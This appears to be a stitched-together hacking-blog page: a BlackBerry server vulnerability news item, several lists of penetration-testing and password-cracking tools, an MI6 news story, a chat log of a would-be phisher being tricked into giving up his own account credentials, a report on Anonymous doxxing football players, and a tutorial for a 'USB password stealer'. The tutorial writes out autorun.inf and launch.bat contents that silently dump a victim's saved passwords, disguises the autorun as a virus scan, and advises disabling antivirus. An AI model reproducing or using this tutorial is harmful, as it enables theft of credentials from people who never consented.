BlackBerry Enterprise Server Vulnerable to TIFF Image Based Exploit

If you are a BlackBerry Enterprise Network user, here is something you need to be careful about. BlackBerry Enterprise Server (BES) users have been warned that an image-based exploit could allow hackers to access and execute code on the servers used to support corporate users of BlackBerry smartphones.

The flaw that been rated as high severity and actual vulnerability in BlackBerry Enterprise Servers resulted from how the server processes image files.

Scenario to Exploit Vulnerability: A malicious person writes a special code and then embeds it in a TIFF image file. The person then convinces a Blackberry smart phone user (whose phone is connected to a corporate BES) to view the TIFF file.

As soon as the image file loads on the phone, the code runs on the Blackberry Enterprise server and either opens up a back door in the network or causes the network to crash altogether as instructed in the basic code.

“RIM is not aware of any attacks on or specifically targeting BlackBerry Enterprise Server customers, and recommends that affected customers update to the latest available software version to be fully protected from these vulnerabilities.” Blackberry said.

The exploit uses a TIFF image containing malicious code, and the dangerous image can either be linked to an email or attached directly to it. Depending on the privileges available to the configured BlackBerry Enterprise Server service account, the attacker might also be able to extend access to other non-segmented parts of the network.

BlackBerry Enterprise Server Express version 5.0.4 and earlier for Microsoft Exchange and IBM Lotus Domino and BlackBerry Enterprise Server version 5.0.4 and earlier for Microsoft Exchange, IBM Lotus Domino and Novell Groupwise are affected only.

For the full RIM statement, issue and resolution visit: Knowledge Base Article BSRT-2013-003

51.526392 -0.091389

My Top Hacking Tools Of All Time

Here is a list of my favorite old & new school information security & hacking tools: 

Burpsuite

Burp Suite is an integrated platform for performing security testing of web applications. Its various tools work seamlessly together to support the entire testing process, from initial mapping and analysis of an applications attack surface, through to finding and exploiting security vulnerabilities.

Cain & Abel

Cain & Abel is a password-cracking juggernaut that runs on Windows. This amazing software, created by Mass-imiliano Montoro, features more than a dozen different useful capabilities for cracking passwords and various encryption keys. For starters, Cain can dump and reveal various encrypted or hashed passwords cached on a local Windows machine, including the standard Windows LANMAN and NTLM password representations, as well as application-specific passwords for Microsoft’s Outlook, Internet Explorer and MSN Explorer. Organizations can use Cain to test individual passwords and the effectiveness of their password policies. Cain & Abel can crack passwords for over a dozen different OS and protocol types. Just for the Windows operating system alone, Cain handles the LANMAN and NTLM password representations in the SAM database, as well as Windows network authentication protocols such as LANMAN Challenge and Response, NTLMv1, NTLMv2 and Micro-soft Kerberos. Its integrated sniffer monitors the LAN, grabbing challenge-and- response packets and cracking passwords using a built-in dictionary of more than 306,000 words. Beyond Windows passwords, Cain also cracks various Cisco passwords, routing proto-col hashes, VNC passwords, RADIUS Shared Secrets, Win95/98 Password List (PWL) files, and Micro-soft SQL Server 2000 and MySQL passwords. It can also crack IKE pre-shared keys in order to penetrate IPSec VPNs that use IKE to exchange and to update their cryptography keys. Beyond password cracking, Cain includes a wireless LAN discovery tool, a hash calculator and an ARP cache-poisoning tool (which can be used to redirect traffic on a LAN so that an attacker can more easily sniff in a switched environment)–all bound together in a sophisticated GUI.

DNSiff

DNSiff is a collection of tools for network auditing and penetration testing. dsniff, filesnarf, mailsnarf, msgsnarf, urlsnarf, and webspy passively monitor a network for interesting data (passwords, e-mail, files, etc.).

Ettercap

Ettercap is a comprehensive suite for man in the middle attacks. It features sniffing of live connections, content filtering on the fly and many other interesting tricks. It supports active and passive dissection of many protocols and includes many features for network and host analysis. Ettercap is a multipurpose sniffer/interceptor/logger for switched LAN.

Fast-track 

Fast-track is an open source security tool aimed at helping penetration testers conduct highly advanced and time consuming attacks in a more methodical and automated way. Fast-Track is now included in Backtrack version 3 onwards under the Backtrack –> Penetration category. In this talk given at Shmoocon 2009, the author of Fast-Track Dave Kennedy runs us through a primer on the tool and demonstrates 7 different scenarios in which he breaks into systems using the Fast-Track tool. These scenarios include automated SQL injection, MSSQL brute forcing, Query string pwnage, Exploit rewrite, Destroying the Client and Autopwnage.

Fport

fport identifies all open TCP/IP and UDP ports and maps them to the owning application.

GFI LANguard

GFI LANguard Network Security Scanner (N.S.S.) automatically scans your entire network, IP by IP, and plays the devil’s advocate alerting you to security vulnerabilities.

Hping

hping is a command-line oriented TCP/IP packet assembler/analyser. The interface is inspired to the ping(8) unix command, but hping isn’t only able to send ICMP echo requests. It supports TCP, UDP, ICMP and RAW-IP protocols, has a traceroute mode, the ability to send files between a covered channel, and many other features. Kind of like the ping program (but with a lot of extensions).

IP Filter

IP Filter is a software package that can be used to provide network address translation (NAT) or firewall services.

John the Ripper

John the Ripper is a fast password cracker, currently available for many flavours of Unix, Windows, DOS, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. Besides several crypt(3) password hash types most commonly found on various Unix systems, supported out of the box are Windows LM hashes, plus lots of other hashes and ciphers in the community-enhanced version.

Kismet

Kismet is an 802.11 layer2 wireless network detector, sniffer, and intrusion detection system. Kismet will work with any wireless card which supports raw monitoring (rfmon) mode, and (with appropriate hardware) can sniff 802.11b, 802.11a, 802.11g, and 802.11n traffic. Kismet also supports plugins which allow sniffing other media such as DECT.  It separates and identifies different wireless networks in the area.

Metasploit Community Edition

Metasploit Community Edition simplifies network discovery and vulnerability verification for specific exploits, increasing the effectiveness of vulnerability scanners. This helps prioritize remediation and eliminate false positives, providing true security risk intelligence. Metasploit provides useful information to people who perform penetration testing, IDS signature development, and exploit research. This project was created to provide information on exploit techniques and to create a useful resource for exploit developers and security professionals. The tools and information on this site are provided for legal security research and testing purposes only.

Ncat

Ncat is a feature-packed networking utility which reads and writes data across networks from the command line. Ncat was written for the Nmap Project as a much-improved reimplementation of the venerable Netcat. It uses both TCP and UDP for communication and is designed to be a reliable back-end tool to instantly provide network connectivity to other applications and users. Ncat will not only work with IPv4 and IPv6 but provides the user with a virtually limitless number of potential uses.

Nessus

The Nessus Project aims to provide to the internet community a free, powerful, up-to-date and easy to use remote security scanner for Linux, BSD, Solaris, and other flavours of Unix.

Netcat

Netcat has been dubbed the network Swiss army knife. It is a simple Unix utility which reads and writes data across network connections, using TCP or UDP protocol

NetFilter

NetFilter and iptables are the framework inside the Linux 2.4.x kernel which enables packet filtering, network address translation (NAT) and other packet mangling.

NexPose Community edition 

The Nexpose Community Edition is a free, single-user vulnerability management solution. Nexpose Community Edition is powered by the same scan engine as Nexpose Enterprise and offers many of the same features.

Nikto2

Nikto is an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 6400 potentially dangerous files/CGIs, checks for outdated versions of over 1200 servers, and version specific problems on over 270 servers. It also checks for server configuration items such as the presence of multiple index files, HTTP server options, and will attempt to identify installed web servers and software.

Nmap

Nmap (Network Mapper) is a free and open source (license) utility for network discovery and security auditing. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics.

OpenPGP

OpenPGP is a non-proprietary protocol for encrypting email using public key cryptography. It is based on PGP as originally developed by Phil Zimmermann.

OpenSSH

OpenSSH is a FREE version of the SSH protocol suite of network connectivity tools, which encrypts all traffic (including passwords) to effectively eliminate eavesdropping, connection hijacking, and other network-level attacks.

Paros Proxy

Many custom Web apps are vulnerable to SQL injection, cross-site scripting, session cloning and other attacks. Attackers often rely on a specialized Web proxy tool designed to manipulate Web applications to reveal and exploit such flaws–and so must you. A Web app manipulation proxy sits between the attacker’s browser and the target Web server. All HTTP and HTTPS requests and responses are channelled through the proxy, which gives the attacker a window to view and alter all of the information passed in the browsing session, including any variables passed by the Web app in cookies, hidden form elements and URLs. Paros Proxy, which runs on Windows or Linux (with a Java Run-time Environment), is the best of these proxies, chock-full of Web app assessment widgets that make it a versatile and powerful hacking tool:

1. Recorder. Paros goes be-yond similar tools by maintaining a thorough history of all HTTP requests and responses. Later, the attacker can review all of the actions, with every page, variable and other element re-corded for detailed analysis.
2. Web spider. An automated Web spider surfs every linked page on a target site, storing its HTML locally for later inspection, and harvests URLs, cookies and hidden form elements for later attack.
3. Hash calculator. Attackers sometimes have a hunch about the encoding or hashing of specific data elements that are returned. Using the Paros calculator, a hacker can quickly and easily test such hunches. Paros Proxy has a GUI tool for calculating the SHA-1, MD5 and Base64 value of any arbitrary text typed in by its user or pasted from an application.
4. SSL-buster. While most other Web app attack and assessment proxies handle server-side SSL certificates, Paros can also probe apps that require client-side SSL certificates.

Paros also includes automated vulnerability scanning and detection capabilities for some of the most common Web application attacks, including SQL injection and cross-site scripting. Paros even scans for unsafe Web content, such as unsigned ActiveX controls and browser ex-ploits sent by the target Web server.

Pf

OpenBSD Packet Filter

SAINT

SAINT network vulnerability assessment scanner detects vulnerabilities in your network’s security before they can be exploited.

Snort

Snort is an open source network intrusion detection system, capable of performing real-time traffic analysis and packet logging on IP networks.

Sqlmap

sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.

TCPdump

TCPdump is the most used network sniffer/analyser for UNIX.

TCPTrace

analyses the dump file format generated by TCPdump and other applications.

THC-Hydra

A very fast network logon cracker which support many different services.

TripWire

Tripwire is a tool that can be used for data and program integrity assurance.

W3af

w3af is a Web Application Attack and Audit Framework. The project’s goal is to create a framework to find and exploit web application vulnerabilities that is easy to use and extend.

Webscarab

WebScarabhas a large amount of functionality, and as such can be quite intimidating to the new user. But, for the simplest case, intercepting and modifying requests and responses between a browser and HTTP/S server, there is not a lot that needs to be learned.

Wellenreiter

A Passive WLAN detector. While numerous tools detect wireless LANs, one of the very best is Wellenreiter. Traditional war driving tools, such as the popular NetStumbler, send a barrage of probe request packets to find wireless access points. But, NetStumbler can’t locate an access point that’s configured to ignore probe requests from clients that don’t know the WLAN SSID. Max Moser’s Wellenreiter can. Wellenreiter is completely passive; instead of sending probe requests, it puts a wireless card into so-called “rfmon mode,” so that it sniffs wireless traffic, capturing all data sent, including the entire wireless frames of all packets with their associated SSIDs, displaying the discovered access points in its GUI. It then listens for ARP or DHCP traffic to determine the MAC and IP addresses of each discovered wireless device. Wellenreiter can store wireless packets in a tcpdump or Wireshark packet capture file for later detailed analysis. An attacker or wireless penetration tester can fire up Wellenreiter, let the tool run passively for an hour or so, and return to find a nifty inventory of nearby wireless devices. It can also interface with GPS devices; storing the physical location of each war-driving computer when wireless LANs are detected. Wellenreiter runs on Linux and supports Prism2, Lucent and Cisco wireless cards.

Wikto

You need a solid Web server vulnerability scanner if you’re going to find flaws before attackers do. Internet-facing Web apps open enormous business opportunities–and dangerous holes for malicious and criminal hackers. In the last year, thousands of sites running vulnerable phpBB Web forum scripts, and countless others hosting the AWStats CGI script for gathering access statistics from log files, have fallen victim to attackers. Beyond those notable examples, vulnerabilities in various Web scripts are discovered on a regular basis. To help find such flaws in your network, turn to Wikto, an impressive Web server scanning tool. Written by Sensepost, a security services firm based in South Africa, Wikto builds on the popular command-line Nikto Web scanner Perl script with an easy-to-use Windows GUI and extended capabilities. Like Nikto, Wikto searches for thousands of flawed scripts, common server misconfigurations and unpatched systems. Wikto adds HTTP fingerprinting technology to identify Web server types based on their protocol behaviour’s, even if administrators purposely disguise Web server banner information to deceive attackers. For white hats, it’s a powerful inventory feature. What’s more, attackers are increasingly turning to well-crafted Google searches to look for vulnerable sites. Security researcher Johnny Long maintains the Google Hacking Database (GHDB) list of more than 1,000 Google searches that can locate vulnerable systems. Wikto can import the latest GHDB vulnerability list, and then query Google for such holes in your domain.

Winfingerprint

A Windows configuration harvester. Windows systems contain a treasure trove of sensitive configuration information that’s accessible in a variety of ways. Attackers and assessment teams typically extract as much information as possible from Windows systems to help refine and augment their vulnerability scans. Winfingerprint, written by Vacuum, is an invaluable tool for harvesting Windows configuration information, using a variety of mechanisms, including Windows domain access, Active Directory and Windows Manage-ment Instrumentation (WMI), Microsoft’s comprehensive framework for analysing system configurations. Winfingerprint pulls lists of users, groups and security settings from a single Windows machine or a network range. The tool also grabs information about the local hard drives of target machines, local system time and date, registry settings, and event logs. Rounding out its features, this handy tool includes a Simple Network Management Protocol (SNMP) scanner, as well as a TCP and UDP port scanner, all accessible from a single GUI

Wireshark

Wireshark is a network protocol analyser. It lets you capture and interactively browse the traffic running on a computer network.

51.526392 -0.091389

British MI6 Replaces al-Qaeda Bomb Recipe with Cupcakes

British MI6 intelligence officers hacked into the Islamic extremist website and magazine, Inspire, and replaced bomb-making instructions with a recipe on how to make cupcakes, media reports said on Friday.

The incident marks the first time that foreign agents were able to breach and alter the website, which is reported to be linked with al-Qaeda on the Arabian Peninsula (AQAP).

The magazine’s original page entitled “Make a Bomb in the Kitchen of Your Mom,” was corrupted, reported The Associated Press.

“We’re increasingly using cybertools as part of our work,” a U.K. foreign official told AP.

When a user attempts to download the PDF of the quarterly magazine page on how to make the bomb, they are redirected to scrambled computer code, reported The Daily Telegraph.

The code was placed into the 67-page magazine by the British intelligence officers and was actually a recipe for “The Best Cupcakes in America,” initially published on Ellen DeGeneres’s show, according to the newspaper. It also included a recipe for a Mojito Cupcake.

Just thought you might find this as funny as I did.

51.526392 -0.091389

A 13 Year Old Tried to Hack a Steam Account, and got Hacked.

This is absolutely hilarious. This guy tried to phish for some dudes password via MSN. It ended up with him getting pwned. The lesson is, don’t phish, i love his end comment. You need to check this out!

br0kenrabbit: hi

Greg_ValveOLS: good evening

br0kenrabbit: What’s ip?

br0kenrabbit: up?

Greg_ValveOLS: my name is greg a member of the valve online Support team

br0kenrabbit: On MSN?

Greg_ValveOLS: yes icon smile

br0kenrabbit: Why?

Greg_ValveOLS: we logged multiple ips from your account and need to verify your information

br0kenrabbit: My information?

Greg_ValveOLS: we believe someone may have stolen your account mmmm you haven’t shared you’re account information with anyone have you?

br0kenrabbit: No. I don’t even have it written down.

Greg_ValveOLS: hmmm maybe a keylogger on you r PC then maybe you need a format?

br0kenrabbit: Well…

Greg_ValveOLS: if you can verify your account information to me i can insure that only your ip have access to it Its a new security feature were trying because this happens so much login names and passwords aint safe anymore You know. L:)

br0kenrabbit: Well

Greg_ValveOLS: dont worry this connect it secure

br0kenrabbit: Can I be honest with you, Greg?

Greg_ValveOLS: k

br0kenrabbit: Look, I don’t know how you go this MSN account name, don’t really care, either.

br0kenrabbit: Unlike you, I DO work for Valve. Trace my ip and you’ll see.

Greg_ValveOLS: huh?

Greg_ValveOLS: bs

br0kenrabbit: Trace it.

Greg_ValveOLS: how

br0kenrabbit says:Start/run/cmd type Tracert and then my IP address and hit enter.

Greg_ValveOLS: oh k

br0kenrabbit: As an employee, I know that Valve employees will NEVER contact users over MSN. I also know a valve employee will NEVER ask a user for his/her username and password.

br0kenrabbit: I’m putting a temporary hold on your Steam account.

Greg_ValveOLS: why?

br0kenrabbit: Have you read the ToS?

Greg_ValveOLS: Tod?

Greg_ValveOLS: tos

br0kenrabbit says:terms of service

Greg_ValveOLS: were?

br0kenrabbit: Greg, this is a serious infraction against the Tos. You are at risk of losing your account.

Greg_ValveOLS: why

br0kenrabbit: I just told you why

Greg_ValveOLS: icon sad

br0kenrabbit: I need some information from you if you want me to unlock you account. I’m going to write you up but I will only suspend you account for three days, since this is your first infraction, okay?

Greg_ValveOLS: k

br0kenrabbit says:First, what is the name the account is registered to. Not the user name, the persons real name who created the account. This is for verification purposes.

Greg_ValveOLS: xxxxx xxxxxxx

br0kenrabbit: Is this you?

Greg_ValveOLS: ya

br0kenrabbit: Are you the only user of this account?

Greg_ValveOLS: ya

br0kenrabbit: Okay, and what is the username

Greg_ValveOLS: xxxxxxxx

br0kenrabbit: Okay.

br0kenrabbit: I see you have purchased a few of our games, thank you. icon smile

Greg_ValveOLS: some. dude

Greg_ValveOLS: m

br0kenrabbit says:Do you always log on from the same IP?

Greg_ValveOLS: ya

br0kenrabbit says:And who is your internet providers, your ISP?

Greg_ValveOLS: xxxxxxx

br0kenrabbit says:Thank you. One moment, please, let me verify this information.

Greg_ValveOLS: am i gonna be bale to play 2nite?

br0kenrabbit: What is your city of residence?

br0kenrabbit: That depends on if you cooperate. You’re doing fine so far.

Greg_ValveOLS: xxxxxx

br0kenrabbit: Illinios?

Greg_ValveOLS: yes

br0kenrabbit: Okay. And what is the password associated with this account?

Greg_ValveOLS: xxxxxxx

br0kenrabbit: Okay. Do not try to log into steam. If you are connected now you need to log off.

Greg_ValveOLS: why

br0kenrabbit: So I can update your account.

Greg_ValveOLS: can I play 2 nite

Greg_ValveOLS: clan fight

Greg_ValveOLS: wont win without me heh

br0kenrabbit: Heh. You’ll have to wait a few minutes. Are you logged off?

Greg_ValveOLS: ya

br0kenrabbit: Okay. Give me just a moment.

br0kenrabbit: Try to log in now.

Greg_ValveOLS: k

Greg_ValveOLS: It says login failed wtf wtf!!@?

br0kenrabbit : Greg

Greg_ValveOLS: did u ban me???????????>WHY

br0kenrabbit: Greg

Greg_ValveOLS: what

br0kenrabbit: Valve will never ask for your username and password.

Greg_ValveOLS: what????

br0kenrabbit: I don’t work for Valve dude, but you just got pwnt.

Greg_ValveOLS: omg dude wtf why?

br0kenrabbit: Why were you trying to steal my account?

Greg_ValveOLS: i wanst

br0kenrabbit: Then why were you asking for my information?

Greg_ValveOLS: i was just making a joke but not serious honest dude just give my acount back pllllleeease i’m only 13 and save d up for like a year to buy it

br0kenrabbit: Greg

Greg_ValveOLS: dude pleas

Greg_ValveOLS: what

br0kenrabbit: Go mow some yards, bitch

51.526392 -0.091389

Top 10 Ethical Hacking Tools

As regular readers will already know I am an avid hacker/cracker and enjoy sharing knowledge. So below is a my ‘Top 10 Ethical Hacking Tools’ for Linux and Windows.

Now remember only use these tools on your own systems or systems that you have permission to use them on. Enjoy

Top 10 Linux Tools

1. nmap – Nmap (“Network Mapper”) is a free open source utility for network exploration or security auditing. It was designed to rapidly scan large networks, although it works fine against single hosts. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics. Nmap runs on most types of computers and both console and graphical versions are available.

2. Nikto – Nikto is an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 3200 potentially dangerous files/CGIs, versions on over 625 servers, and version specific problems on over 230 servers. Scan items and plugins are frequently updated and can be automatically updated (if desired).

3. THC-Amap – Amap is a next-generation tool for assistingnetwork penetration testing. It performs fast and reliable application protocol detection, independant on the TCP/UDP port they are being bound to.

4. Ethereal – Ethereal is used by network professionals around the world for troubleshooting, analysis, software and protocol development, and education. It has all of the standard features you would expect in a protocol analyzer, and several features not seen in any other product.

5. THC-Hydra – Number one of the biggest security holes are passwords, as every password security study shows. Hydra is a parallized login cracker which supports numerous protocols to attack. New modules are easy to add, beside that, it is flexible and very fast.

6. Metasploit Framework – The Metasploit Framework is an advanced open-source platform for developing, testing, and using exploit code. This project initially started off as a portable network game and has evolved into a powerful tool for penetration testing, exploit development, and vulnerability research.

7. John the Ripper – John the Ripper is a fast password cracker, currently available for many flavors of Unix (11 are officially supported, not counting different architectures), DOS, Win32, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. Besides several crypt(3) password hash types most commonly found on various Unix flavors, supported out of the box are Kerberos AFS and Windows NT/2000/XP/2003 LM hashes, plus several more with contributed patches.

8. Nessus – Nessus is the world’s most popular vulnerability scanner used in over 75,000 organisations world-wide. Many of the world’s largest organisations are realising significant cost savings by using Nessus to audit business-critical enterprise devices and applications.

9. IRPAS – Internetwork Routing Protocol Attack Suite – Routing protocols are by definition protocols, which are used by routers to communicate with each other about ways to deliver routed protocols, such as IP. While many improvements have been done to the host security since the early days of the Internet, the core of this network still uses unauthenticated services for critical communication.

10. Rainbowcrack – RainbowCrack is a general propose implementation of Philippe Oechslin’s faster time-memory trade-off technique. In short, the RainbowCrack tool is a hash cracker. A traditional brute force cracker try all possible plaintexts one by one in cracking time. It is time consuming to break complex password in this way. The idea of time-memory trade-off is to do all cracking time computation in advance and store the result in files so called “rainbow table”.

 

Top 10 Windows Tools

1. Cain & Abel – Cain & Abel is a password recovery tool for the Microsoft Windows Operating System. It allows easy recovery of various kind of passwords by sniffing the network, cracking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, revealing password boxes, uncovering cached passwords and analyzing routing protocols.

2. SuperScan – SuperScan is a powerful TCP port scanner, pinger, resolver. SuperScan 4 (Current Version) is a completely-rewritten update of the highly popular Windows port scanning tool, SuperScan.

3. GFI LanGuard Network Security Scanner – GFI LanGuard is an award-winning vulnerability management solution used by over 20,000 customers. GFI LanGuard scans your network and ports to detect, assess and rectify security vulnerabilities on your network, with minimal administrative effort! It also provides the tools to remediate vulnerabilities and install missing patches on your network. This solution gives you a complete picture of your network set-up and helps you to maintain a secure network state faster and more effectively. GFI LanGuard performs network scans using vulnerability check databases based on OVAL and SANS Top 20, providing over 15,000 vulnerability assessments when your network, including any virtual environment, is scanned.

4. PWDumpX v1.1 – This tool allows a user with administrative privileges to retrieve the domain password cache, the password hashes and the LSA secrets from a Windows system. This tool can be used on the local system or on one or more remote systems.

5. Dark Elevator – This tool is a Windows privilege escalation tool. It has two main modes, running as a standard user, it tries to find a way to Admin or System access on a box. In audit mode, it runs as admin and tries to find ways for a specific user to escalate their privileges.

6. GetAcct – An oldie, but still useful on Pen Tests. GetAcct sidesteps “RestrictAnonymous=1″ and acquires account information on Windows NT/2000/XP/2003 machines.

7. Solarwinds – Solarwinds contains many network monitoring, discovery and attack tools. The advanced security tools not only test internet security with the SNMP Brute Force Attack and Dictionary Attack utilities but also validate the security on Cisco Routers with the Router Security Check. The Remote TCP Reset remotely display all active sessions on a device and the Password Decryption can decrypt Type 7 Cisco Passwords. The Port Scanner allows testing for open TCP ports across IP Address and port ranges or selection of specific machines and ports.

8. Burp Suite – Burp Suite is an integrated platform for attacking web applications. It contains all of the Burp tools with numerous interfaces between them designed to facilitate and speed up the process of attacking an application. All tools share the same robust framework for handling HTTP requests, authentication, downstream proxies, logging, alerting and extensibility.

9. CookieDigger - CookieDigger helps identify weak cookie generation and insecure implementations of session management by web applications. The tool works by collecting and analyzing cookies issued by a web application for multiple users. The tool reports on the predictability and entropy of the cookie and whether critical information, such as user name and password, are included in the cookie values.

10. Netcat (The Network SwissArmy Knife) – Netcat was originally a Unix utility which reads and writes data across network connections, using TCP or UDP protocol. It is designed to be a reliable “back-end” tool that can be used directly or easily driven by other programs and scripts. At the same time, it is a feature-rich network debugging and exploration tool, since it can create almost any kind of connection you would need and has several interesting built-in capabilities.

 

51.526392 -0.091389

Anonymous Hack Team Website Demand Apology for Assault

Hackers identifying as “KnightSec,” an arm of Anonymous, attacked the website of an Ohio high school football team to demand a public apology for the gang rape of a 16-year-old girl reportedly perpetrated by players.

Last weekend, the website of the locally celebrated Steubenville High School Big Red football team was replaced with a note and a video from the hackers in typical Anonymous style — a message from a Guy Fawkes mask and a computerized voice. KnightSec warned that it would release personal information including names and Social Security numbers of Big Red players and staff if an apology was not issued to the rape victim. The hackers also released “preliminary” information, which they called “a warning shot,” publishing names, addresses, phone numbers, and names of parent of 13 players allegedly involved in the rape.

“The town of Steubenville has been good at keeping this quiet and their star football team protected,” the KnightSec statement read.

Last week the New York Times reported on the disturbing assault in the small Ohio town. A 16-year-old girl was, according to prosecutors, gang raped and drag from party to party by a number of star football players while she was too drunk to consent. Via the Times:

Twitter posts, videos and photographs circulated by some who attended the nightlong set of parties suggested that an unconscious girl had been sexually assaulted over several hours while others watched. She even might have been urinated on.

In one photograph posted on Instagram by a Steubenville High football player, the girl, who was from across the Ohio River in Weirton, W.Va., is shown looking unresponsive as two boys carry her by her wrists and ankles. Twitter users wrote the words “rape” and “drunk girl” in their posts.

Two 16-year-old Big Red players, Trent Mays and Ma’lik Richmond are on house arrest on charges that they raped the girl. Their hearing is set for February. Meanwhile, many members of the Steubenville community have defended the players and blamed the rape victim for trying to defame their beloved team.

 

51.526392 -0.091389

Backup\Steal Passwords Using a USB

This post is of-course for educational purposes only.

Although the title of this post implies that this is designed for a USB, any device like an MP3 player or a mobile phone can be used as they can all execute programs.

We know that windows stores most of its passwords on daily basis , such as MSN messenger passwords,Yahoo passwords,Facebook passwords etc. Most people hate to type passwords over and over again; so when that little tick box appears that asks to save/remember password the opportunity is jumped at, this shall be their undoing.

 

Things you will need?
Note: Before downloading the following apps you might want to disable your Anti Virus, as most of these will appear as a suspicious file.

MessenPass - MessenPass is a password recovery tool that reveals the passwords of the following instant messenger applications:

• MSN Messenger
• Windows Messenger (In Windows XP)
• Windows Live Messenger (In Windows XP/Vista/7)
• Yahoo Messenger (Versions 5.x and 6.x)
• Google Talk
• ICQ Lite 4.x/5.x/2003
• AOL Instant Messenger v4.6 or below, AIM 6.x, and AIM Pro.
• Trillian
• Trillian Astra
• Miranda
• GAIM/Pidgin
• MySpace IM
• PaltalkScene
• Digsby

Mail PassView - Mail PassView is a small password-recovery tool that reveals the passwords and other account details for:

• Outlook Express
• Microsoft Outlook 2000 (POP3 and SMTP Accounts only)
• Microsoft Outlook 2002/2003/2007/2010 (POP3, IMAP, HTTP and SMTP Accounts)
• Windows Mail
• Windows Live Mail
• IncrediMail
• Eudora
• Netscape 6.x/7.x (If the password is not encrypted with master password)
• Mozilla Thunderbird (If the password is not encrypted with master password)
• Group Mail Free
• Yahoo! Mail – If the password is saved in Yahoo! Messenger application.
• Hotmail/MSN mail – If the password is saved in MSN/Windows/Live Messenger application.
• Gmail – If the password is saved by Gmail Notifier application, Google Desktop, or by Google Talk.

IE Passview - IE passview is a small program that helps us view stored passwords in Internet Explorer.

Protected storage pass viewer(PSPV) -  Protected Storage PassView is a small utility that reveals the passwords stored on your computer by Internet Explorer, Outlook Express and MSN Explorer.

Password Fox - Password fox is a small program used to view Stored passwords in Mozilla Firefox

Now here is a step by step tutorial to create a USB password stealer to steal saved passwords:

1.First of all download all 5 tools and copy the executable files in your USB  i.e. Copy the files  mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe into your USB Drive.
2. Create a new Notepad and write the following text into it.

[autorun]

open=launch.bat

ACTION= Perform a Virus Scan

save the Notepad and rename it from

New Text Document.txt to autorun.inf

Now copy the autorun.inf file onto your USB

 

3. Create another Notepad and write the following text onto it.

start mspass.exe /stext mspass.txt

start mailpv.exe /stext mailpv.txt

start iepv.exe /stext iepv.txt

start pspv.exe /stext pspv.txt

start passwordfox.exe /stext passwordfox.txt
Save the Notepad file and rename it from New Text Document.txt to launch.bat

Copy the launch.bat file also to your USB drive.
Now your USB Password stealer is ready, all you have to do is insert it in your victims computer and  a popup will appear, in the popup window select the option (Launch virus scan) as soon as you will click it the following window will appear.

After this you can see saved password in .TXT files on the USB
Have fun and hack responsibly

51.526392 -0.091389

Top 15 Open Source/Free Security/Hacking Tools

1. Nmap

Nmap (“Network Mapper”) is a free and open source (license) utility for network discovery and security auditing. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics. Nmap homepage.

2. Wireshark

Wireshark is a network protocol analyzer. It lets you capture and interactively browse the traffic running on a computer network. Wireshark homepage.

3. Metasploit Community edition

Metasploit Community Edition simplifies network discovery and vulnerability verification for specific exploits, increasing the effectiveness of vulnerability scanners. This helps prioritize remediation and eliminate false positives, providing true security risk intelligence. Metasploit community edition homepage.

4. Nikto2

Nikto is an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 6400 potentially dangerous files/CGIs, checks for outdated versions of over 1200 servers, and version specific problems on over 270 servers. It also checks for server configuration items such as the presence of multiple index files, HTTP server options, and will attempt to identify installed web servers and software. Nikto2 homepage.

5. John the Ripper

John the Ripper is a fast password cracker, currently available for many flavors of Unix, Windows, DOS, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. Besides several crypt(3) password hash types most commonly found on various Unix systems, supported out of the box are Windows LM hashes, plus lots of other hashes and ciphers in the community-enhanced version. John the Ripper homepage.

6. ettercap

Ettercap is a comprehensive suite for man in the middle attacks. It features sniffing of live connections, content filtering on the fly and many other interesting tricks. It supports active and passive dissection of many protocols and includes many features for network and host analysis. ettercap homepage.

7. NexPose Community edition

The Nexpose Community Edition is a free, single-user vulnerability management solution. Nexpose Community Edition is powered by the same scan engine as Nexpose Enterprise and offers many of the same features. Nexpose homepage.

8. Ncat

Ncat is a feature-packed networking utility which reads and writes data across networks from the command line. Ncat was written for the Nmap Project as a much-improved reimplementation of the venerable Netcat. It uses both TCP and UDP for communication and is designed to be a reliable back-end tool to instantly provide network connectivity to other applications and users. Ncat will not only work with IPv4 and IPv6 but provides the user with a virtually limitless number of potential uses. ncat homepage.

9. Kismet

Kismet is an 802.11 layer2 wireless network detector, sniffer, and intrusion detection system. Kismet will work with any wireless card which supports raw monitoring (rfmon) mode, and (with appropriate hardware) can sniff 802.11b, 802.11a, 802.11g, and 802.11n traffic. Kismet also supports plugins which allow sniffing other media such as DECT. kismet homepage.

10. w3af

w3af is a Web Application Attack and Audit Framework. The project’s goal is to create a framework to find and exploit web application vulnerabilities that is easy to use and extend. w3af homepage.

11. hping

hping is a command-line oriented TCP/IP packet assembler/analyzer. The interface is inspired to the ping(8) unix command, but hping isn’t only able to send ICMP echo requests. It supports TCP, UDP, ICMP and RAW-IP protocols, has a traceroute mode, the ability to send files between a covered channel, and many other features. hping homepage.

12. burpsuite

Burp Suite is an integrated platform for performing security testing of web applications. Its various tools work seamlessly together to support the entire testing process, from initial mapping and analysis of an application’s attack surface, through to finding and exploiting security vulnerabilities. BurpSuite homepage.

13. THC-Hydra

A very fast network logon cracker which support many different services.  hydra homepage.

14. sqlmap

